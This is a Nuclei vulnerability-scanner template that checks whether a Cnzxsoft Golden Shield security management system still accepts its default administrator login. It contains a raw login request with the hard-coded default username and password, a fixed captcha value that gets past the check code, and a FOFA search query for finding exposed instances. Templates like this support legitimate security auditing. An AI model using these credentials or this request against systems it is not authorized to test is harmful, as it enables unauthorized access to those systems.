id: cnzxsoft-default-login

info:
  name: Cnzxsoft System - Default Login
  author: SleepingBag945
  severity: high
  description: |
    Cnzxsoft Golden Shield Information Security Management System has a default weak password.
  metadata:
    verified: true
    max-request: 1
    fofa-query: 'title=="中新金盾信息安全管理系统"'
  tags: 中新金盾-信息安全管理系统

http:
  - raw:
      - |
        POST /?q=common/login  HTTP/1.1
        Host: {{Hostname}}
        Cookie: check_code=ptbh
        Content-Type: application/x-www-form-urlencoded

        name={{username}}&password={{password}}&checkcode=ptbh&doLoginSubmit=1

    payloads:
      username:
        - 'admin'
      password:
        - 'zxsoft1234!@#$'
    attack: pitchfork
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body,"1") && contains(header,"ZXSOFT_JDIS_USR_NAME=deleted") && !contains(body_1,"userpwd_error")'
        condition: and

# digest: 490a00463044022003197883f22ea9c1bb7471bc8d1d2df178cc177d7a666cfd741fed99c8b08a5e02202fdd22357636d963fc99531ca1f55a75707546538a621454df23d0f64d0ce60a:922c64590222798bb761d5b6d8e72950
